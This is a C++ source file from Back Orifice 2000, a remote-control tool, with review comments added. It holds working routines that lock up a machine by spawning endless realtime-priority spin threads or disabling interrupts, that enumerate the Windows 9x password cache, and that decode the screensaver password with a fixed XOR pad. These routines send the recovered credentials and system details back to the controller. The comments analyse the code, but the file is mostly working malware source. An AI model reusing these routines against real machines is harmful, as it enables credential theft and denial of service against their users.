/* Back Orifice 2000 - Remote Administration Suite
Copyright (C) 1999, Cult Of The Dead Cow
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
The author of this program may be contacted at dildog@l0pht.com. */
#include "stdafx.h"
#include "..\\Ctrl_Srvr9.h"
#include "..\\MainFrm.h"
#include "cmd_system.h"
#include "Func_Bo.h"
// Asks the local session to end.  Despite the name, the NT branch only
// requests a logoff (EWX_LOGOFF); a forced reboot (EWX_FORCE|EWX_REBOOT)
// is issued on Win9x only.  Nothing in this block acquires
// SE_SHUTDOWN_NAME, which is presumably why NT is limited to logoff --
// TODO confirm against the callers' expectations.
// Returns 0 if ExitWindowsEx accepted the request, -1 if it returned FALSE.
// Note that a successful call may never return to the caller at all.
int CmdProc_SysReboot(void)
{
    unsigned int uFlags = g_bIsWinNT ? EWX_LOGOFF : (EWX_FORCE | EWX_REBOOT);
    return ExitWindowsEx(uFlags, 0) ? 0 : -1;
}
// Thread entry point used by CmdProc_SysLockup: spins forever, burning a
// CPU at whatever priority the creator assigned.  It is a denial-of-service
// primitive and never returns; the trailing return exists only to satisfy
// the DWORD WINAPI signature required by CreateThread.
//
// param is ignored.
DWORD WINAPI LockThread(LPVOID param)
{
    (void)param;
    for (;;)
    {
        // intentionally empty: busy-wait until the machine is wedged
    }
    return 0;
}
// Deliberately makes the machine unresponsive.  This is a denial-of-service
// primitive, not a recoverable operation: neither branch ever returns, so
// the final `return 0` is unreachable.
//
// Sequence: announce the lockup through the main frame's SendStringMsg,
// wait two seconds (presumably so the message is flushed to the controller
// first -- TODO confirm), then starve the system:
//   * NT: raise this process to REALTIME_PRIORITY_CLASS and create an
//     unbounded number of LockThread spinners at THREAD_PRIORITY_TIME_CRITICAL.
//   * Win9x: execute `cli` and spin in place with interrupts disabled.
int CmdProc_SysLockup(void)
{
    CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp ()->m_pMainWnd;
    pMainWnd->SendStringMsg ("MSG: Locking up machine[Don't expect much to work after this!]");
    // IssueAuthCommandReply(cas_from,comid,0,"Locking up machine[Don't expect much to work after this!]");
    Sleep(2000);
    if(g_bIsWinNT)
    {
        // NOTE(review): return value not checked.  Realtime class presumably
        // needs SeIncreaseBasePriorityPrivilege on NT, so this may silently
        // leave the process at its previous class.
        SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
        while(1)
        {
            DWORD dwTid;
            // NOTE(review): hThread is neither checked for NULL nor closed;
            // SetThreadPriority is called even if creation failed.  Handle
            // exhaustion looks intentional here, not a leak to fix.
            HANDLE hThread=CreateThread(NULL,0,LockThread,NULL,0,&dwTid);
            SetThreadPriority(hThread,THREAD_PRIORITY_TIME_CRITICAL);
        }
    }
    else
    {
        // `cli` is a privileged instruction; this branch relies on Win9x
        // tolerating it from a ring-3 Win32 app (inferred, not verified here).
        lockpoint:
        __asm {
            cli
            jmp lockpoint
        }
    }
    return 0;
}
// Accumulator passed to PassCacheCallback through its DWORD dwRefData
// argument.  It describes a caller-owned byte buffer that receives
// consecutive NUL-terminated strings (resource, password, resource, ...).
// Packed to 1 byte, although no code in this file reads it as raw bytes.
#pragma pack(push,1)
typedef struct {
    char *pBuffer;   // destination buffer, allocated and freed by the caller
    int nBufLen;     // capacity of pBuffer in bytes
    int nBufPos;     // next free offset; advanced past each string's NUL
} PASSCACHECALLBACK_DATA;
#pragma pack(pop)
// Enumeration callback for the Win9x password cache (WNetEnumCachedPasswords).
// For each cache entry it appends two NUL-terminated, OEM-converted strings
// to the PASSCACHECALLBACK_DATA buffer referenced by dwRefData: first the
// resource name (pce->abResource, cbResource bytes), then the password,
// which this code reads from the bytes immediately following the resource
// (pce->abResource + cbResource, cbPassword bytes).
//
// Returns TRUE to continue enumeration, FALSE to stop it when the next
// string (plus its NUL) would not fit in the remaining buffer.  Each source
// field is clamped to 1023 bytes before conversion.
//
// NOTE(review): no terminating empty string is written after the last entry;
// the consumer is responsible for knowing where the data ends.  The local
// buffers (buff, buff2) hold a plaintext password and are not zeroized.
BOOL PASCAL PassCacheCallback(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
{
    char buff[1024];
    char buff2[1024];
    int nCount;
    PASSCACHECALLBACK_DATA *dat;
    dat = (PASSCACHECALLBACK_DATA *)dwRefData;
    // --- resource name ---
    nCount=pce->cbResource;
    if(nCount>1023) nCount=1023;   // leave room for the terminator in buff[1024]
    memmove(buff, pce->abResource, nCount);
    buff[nCount] = 0;
    CharToOem(buff, buff2);
    // Require nBufPos + strlen < nBufLen so the copied NUL lands at index <= nBufLen-1.
    if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
    lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
    dat->nBufPos+=lstrlen(buff2)+1;
    // --- password: the bytes right after the resource name in the entry ---
    nCount=pce->cbPassword;
    if(nCount>1023) nCount=1023;
    memmove(buff, pce->abResource+pce->cbResource, nCount);
    buff[nCount] = 0;
    CharToOem(buff, buff2);
    if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
    lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
    dat->nBufPos+=lstrlen(buff2)+1;
    return TRUE;
}
// Reports credentials cached on the target machine to the controller UI via
// pWnd, which is cast to CMainFrame without a check.  Win9x only in this build:
//   1. the password cache, enumerated through pWNetEnumCachedPasswords and
//      reported as "SYS: Resource: '...' Password: '...'" lines;
//   2. the screensaver password under
//      HKEY_USERS\.Default\Control Panel\desktop\ScreenSave_Data, which this
//      code treats as hex-encoded bytes XORed with a fixed 60-byte pad.
// On NT the body is a stub (the hash-dump call is commented out) and nothing
// is sent.  Always returns 0; failures are reported as "SYS:" messages.
int CmdProc_SysListPasswords(CWnd * pWnd)
{
    char svBuffer[512];
    DWORD dwBufSize;
    char svReply[512];
    CString strMsg;   // unused
    CMainFrame *pMainWnd = (CMainFrame *)pWnd;
    if (g_bIsWinNT)
    {
        // PWDump style password dumping
        // DumpPasswordHashes(cas_from,comid);
    } else {
        // Return passwords from password cache
        pMainWnd->SendStringMsg ("SYS: Passwords cached by system:");
        // IssueAuthCommandReply(cas_from,comid,1,"Passwords cached by system:");
        PASSCACHECALLBACK_DATA dat;
        // NOTE(review): malloc is unchecked and the block is not zeroed.
        // PassCacheCallback never writes a terminating empty string, so the
        // `while(*svStr)` walk below depends on whatever byte follows the last
        // entry -- with an empty cache it reads uninitialized memory.  A zeroed
        // allocation (or an explicit final NUL) would bound the walk.
        dat.pBuffer=(char *)malloc(65536);
        dat.nBufLen=65536;
        dat.nBufPos=0;
        // pWNetEnumCachedPasswords is a function pointer (see Func_Bo.h),
        // presumably resolved at run time because the API is Win9x-only.
        // Its return value is ignored; 0xff is presumably an entry-type mask.
        pWNetEnumCachedPasswords(NULL, 0, 0xff, PassCacheCallback, (DWORD) &dat);
        pMainWnd->SendStringMsg ("SYS: Cached Passwords:");
        // IssueAuthCommandReply(cas_from,comid,1,"Cached Passwords:");
        char *svStr;
        svStr=dat.pBuffer;
        // Strings come in pairs: resource, then password, each NUL-terminated.
        while(*svStr!='\0')
        {
            char *svRsc=svStr;
            svStr+=lstrlen(svStr)+1;
            char *svPwd=svStr;
            svStr+=lstrlen(svStr)+1;
            char svBuff[1024];
            // %.256s caps each field so the 1024-byte line cannot overflow.
            wsprintf(svBuff, "SYS: Resource: '%.256s' Password: '%.256s'", svRsc, svPwd);
            pMainWnd->SendStringMsg ((LPCTSTR)svBuff);
            // IssueAuthCommandReply(cas_from,comid,1,svBuff);
        }
        // NOTE(review): plaintext passwords are freed without being zeroized.
        free(dat.pBuffer);
        pMainWnd->SendStringMsg ("SYS: End of cached passwords.");
        // IssueAuthCommandReply(cas_from,comid,1,"End of cached passwords.");
        // Return screen saver password
        // Key path walked one component at a time from HKEY_USERS; the empty
        // string ends the walk (5 slots, 4 initializers: [4] is a null pointer
        // that is never reached).
        char *regpws[5] = { ".Default", "Control Panel", "desktop", "" };
        HKEY key=HKEY_USERS,key2;
        int l;
        DWORD indx=0;
        while(regpws[indx][0])
        {
            l=RegOpenKeyEx(key, regpws[indx], 0, KEY_READ, &key2) ;
            // Close the parent once the child open has been attempted; the
            // predefined root handle is never closed.
            if(key!=HKEY_USERS) RegCloseKey(key);
            if(l!=ERROR_SUCCESS)
            {
                // Any missing component is reported as "no password".  The
                // parent was already closed above, so bypassing the
                // RegCloseKey before the label does not leak a handle.
                lstrcpy(svReply,"SYS: There is no screensaver password.");
                goto exitssavepw;
            }
            key = key2;
            indx++;
        }
        dwBufSize=512;   // in/out: capacity of svBuffer, then bytes returned
        if(RegQueryValueEx(key, "ScreenSave_Data", NULL, NULL, (BYTE *)svBuffer, &dwBufSize)!=ERROR_SUCCESS)
        {
            lstrcpy(svReply, "SYS: Unable to read value 'ScreenSave_Data'.");
        }
        else
        {
            // decode hex chars
            // In place, two ASCII digits per output byte (indx <= 2*indx, so
            // the write never overtakes the read).  Non-hex characters --
            // including a REG_SZ's trailing NUL -- are passed through
            // unchanged rather than rejected; an odd trailing byte is ignored.
            for (indx = 0; indx < dwBufSize/2; indx++)
            {
                char c1,c2;
                c1=svBuffer[indx*2];
                if(c1>='A' && c1<='F') c1=(c1-'A')+0xA;
                else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA;
                else if(c1>='0' && c1<='9') c1=c1-'0';
                c2=svBuffer[indx*2+1];
                if(c2>='A' && c2<='F') c2=(c2-'A')+0xA;
                else if(c2>='a' && c2<='f') c2=(c2-'a')+0xA;
                else if(c2>='0' && c2<='9') c2=c2-'0';
                svBuffer[indx] = (c1<<4) | c2;
            }
            // xor with pad
            // Fixed 60-byte pad; only the first min(len, 60) decoded bytes are
            // unmasked, so longer values are truncated to 60 characters.
            unsigned char xorpattern[60] = {0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B,
                0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F,
                0x78, 0xd9, 0xda, 0x6c, 0x59, 0xd7, 0x6B, 0x35,
                0xC5, 0x77, 0x85, 0x18, 0x2A, 0x0E, 0x52, 0xFF,
                0x00, 0xE3, 0x1B, 0x71, 0x8D, 0x34, 0x63, 0xEB,
                0x91, 0xC3, 0x24, 0x0F, 0xB7, 0xC2, 0xF8, 0xE3,
                0xB6, 0x54, 0x4C, 0x35, 0x54, 0xE7, 0xC9, 0x49,
                0x28, 0xA3, 0x85, 0x11};
            DWORD len;
            len=dwBufSize/2;
            if(len>60) len=60;
            for (indx = 0; indx < len; indx++)
            {
                svBuffer[indx] ^= xorpattern[indx];
            }
            svBuffer[len] = '\0';   // len <= 60 < sizeof svBuffer, so in bounds
            // NOTE(review): the recovered plaintext remains in svBuffer and
            // svReply; neither is zeroized before return.
            wsprintf(svReply, "SYS: ScreenSaver password: '%s'", svBuffer);
        }
        RegCloseKey(key);
exitssavepw:
        int n = 0;   // unused
        pMainWnd->SendStringMsg ((LPCTSTR)svReply);
        // IssueAuthCommandReply(cas_from, comid,0,svReply);
    }
    return 0;
}
// Placeholder for the "view console" command.  Not implemented in this
// build: it performs no work and always reports failure.
// Returns -1 (the failure code used by the other CmdProc_* functions here).
int CmdProc_SysViewConsole(void)
{
    const int kNotImplemented = -1;
    return kNotImplemented;
}
// Reports basic facts about the target machine to the controller UI via
// pWnd (cast to CMainFrame without a check), one "SYS: ..." line each:
// computer name, current user, processor type, OS platform and version,
// global memory status, and the type (plus free-space figures for fixed
// disks) of every drive letter C: through Z:.  A query that fails yields
// its own "SYS: Could not ..." line and the remaining queries still run.
// Always returns 0.
int CmdProc_SysInfo(CWnd * pWnd)
{
    char svBuffer[512];
    DWORD dwBufSize;
    char svReply[512];
    char svReply1[512];
    // Send back computer name
    CMainFrame *pMainWnd = (CMainFrame *)pWnd;
    // In/out size in characters; MAX_COMPUTERNAME_LENGTH+1 is well below 512.
    dwBufSize = MAX_COMPUTERNAME_LENGTH+1;
    if(GetComputerName(svBuffer, &dwBufSize)==FALSE)
    {
        pMainWnd->SendStringMsg ("SYS: Could not retrieve machine name.");
        // IssueAuthCommandReply(cas_from,comid,1,"Could not retrieve machine name.");
    }
    else
    {
        // %.400s caps the name so the 512-byte reply cannot overflow.
        wsprintf(svReply, "SYS: System info for machine '%.400s'", svBuffer);
        pMainWnd->SendStringMsg ((LPCTSTR)svReply);
        // IssueAuthCommandReply(cas_from,comid,1,svReply);
    }
    // Send back currently logged in user name
    dwBufSize = 512;   // full capacity of svBuffer
    if(GetUserName(svBuffer, &dwBufSize)==FALSE)
    {
        pMainWnd->SendStringMsg ("SYS: Could not retrieve user name.");
        // IssueAuthCommandReply(cas_from,comid,1,"Could not retrieve user name.");
    }
    else
    {
        wsprintf(svReply, "SYS: Current user: '%.400s'", svBuffer);
        pMainWnd->SendStringMsg ((LPCTSTR)svReply);
        // IssueAuthCommandReply(cas_from,comid,1,svReply);
    }
    // Send back processor info
    // Only the four dwProcessorType values below are named; anything else
    // (including every post-Pentium CPU) is reported as UNKNOWN.
    SYSTEM_INFO sysInfo;
    lstrcpy(svReply, "SYS: Processor: ");
    GetSystemInfo(&sysInfo);
    switch (sysInfo.dwProcessorType)
    {
        case PROCESSOR_INTEL_386:
            lstrcat(svReply, "I386");
            break;
        case PROCESSOR_INTEL_486:
            lstrcat(svReply, "I486");
            break;
        case PROCESSOR_INTEL_PENTIUM:
            lstrcat(svReply, "I586");
            break;
        case PROCESSOR_MIPS_R4000:
            lstrcat(svReply, "MIPSR4000");
            break;
        default:
            lstrcat(svReply, "UNKNOWN");
            break;
    }
    pMainWnd->SendStringMsg ((LPCTSTR)svReply);
    // IssueAuthCommandReply(cas_from,comid,1,svReply);
    // Send back OS version info
    OSVERSIONINFO osvi;
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);   // required before GetVersionEx
    if (GetVersionEx(&osvi) == FALSE)
    {
        lstrcpy(svReply, "SYS: Could not get version info.");
    }
    else
    {
        // Platform label is fixed per dwPlatformId: every Win9x-family release
        // is labelled "Windows 95" here; the version numbers disambiguate.
        switch(osvi.dwPlatformId)
        {
            case VER_PLATFORM_WIN32s:
                lstrcpy( svBuffer, "Win32s on Windows 3.1");
                break;
            case VER_PLATFORM_WIN32_WINDOWS:
                lstrcpy( svBuffer, "Win32 on Windows 95");
                break;
            case VER_PLATFORM_WIN32_NT:
                lstrcpy( svBuffer, "Windows NT");
                break;
            default:
                lstrcpy( svBuffer, "Windows?");
                break;
        }
        // Only the low word of the build number is shown.
        wsprintf( svReply, "SYS: %s v%d.%d build %d", svBuffer, (int)osvi.dwMajorVersion, (int)osvi.dwMinorVersion, (int)LOWORD(osvi.dwBuildNumber));
        if(lstrlen(osvi.szCSDVersion))
        {
            // Service-pack string; szCSDVersion is bounded by the OSVERSIONINFO
            // layout and fits comfortably after the ~60-char prefix.
            lstrcat(svReply, " - ");
            lstrcat(svReply, osvi.szCSDVersion);
        }
    }
    pMainWnd->SendStringMsg ((LPCTSTR)svReply);
    // IssueAuthCommandReply(cas_from,comid,1,svReply);
    // Send back global memory usage
    MEMORYSTATUS memstat;
    DWORD dw,dw2,dw3,dw4;
    char c;
    int x;
    memstat.dwLength = sizeof(memstat);   // required before GlobalMemoryStatus
    GlobalMemoryStatus(&memstat);
    // NOTE(review): DWORD quantities printed with %d (signed); figures are in MiB.
    wsprintf(svReply, "SYS: Memory: %dM, in use: %d%%, Page file: %dM, free: %dM", memstat.dwTotalPhys/1024/1024, memstat.dwMemoryLoad, memstat.dwTotalPageFile/1024/1024, memstat.dwAvailPageFile/1024/1024 );
    pMainWnd->SendStringMsg ((LPCTSTR)svReply);
    // IssueAuthCommandReply(cas_from,comid,1,svReply);
    // Drive letters A: and B: are deliberately skipped.
    for (c = 'C'; c <= 'Z'; c++)
    {
        wsprintf(svReply, "%c:\\", c);
        x = GetDriveType(svReply);
        lstrcat( svReply, " - ");
        switch (x)
        {
            case 0:   // DRIVE_UNKNOWN
                lstrcat(svReply, "Unable to determine.");
                break;
            case 1:   // DRIVE_NO_ROOT_DIR: no volume here, emit nothing for this letter
                svReply[0]='\0';
                break;
            case DRIVE_FIXED:
                lstrcat(svReply, "Fixed");
                wsprintf(svBuffer, "%c:\\", c);
                // dw = sectors/cluster, dw2 = bytes/sector, dw3 = free clusters,
                // dw4 = total clusters (GetDiskFreeSpace parameter order).
                if (GetDiskFreeSpace(svBuffer, &dw, &dw2, &dw3, &dw4)) {
                    // NOTE(review): dw3*dw2*dw and dw4*dw2*dw are 32-bit
                    // products and wrap modulo 2^32, so volumes of 4 GiB or
                    // more are reported incorrectly.
                    wsprintf(svBuffer, " Sec/Clust: %u, Byts/Sec: %u, Bytes free: %u / %u",
                        (unsigned int)dw, (unsigned int)dw2, (unsigned int)(dw3*dw2*dw), (unsigned int)(dw4*dw2*dw));
                    lstrcat(svReply, svBuffer);
                }
                break;
            case DRIVE_REMOVABLE:
                lstrcat(svReply, "Removable");
                break;
            case DRIVE_REMOTE:
                lstrcat(svReply, "Remote");
                break;
            case DRIVE_CDROM:
                lstrcat(svReply, "CD-ROM");
                break;
            case DRIVE_RAMDISK:
                lstrcat(svReply, "Ramdisk");
                break;
            default:
                lstrcat(svReply, "Unknown type!");
                break;
        }
        // Empty svReply means DRIVE_NO_ROOT_DIR above; otherwise prefix and send.
        if(lstrlen(svReply))
        {
            lstrcpy (svReply1,"SYS: ");
            lstrcat (svReply1,svReply);
            pMainWnd->SendStringMsg ((LPCTSTR)svReply1);
            // IssueAuthCommandReply(cas_from,comid,1,svReply);
        }
    }
    // pMainWnd->SendStringMsg ("End of system info");
    // IssueAuthCommandReply(cas_from,comid,0,"End of system info");
    return 0;
}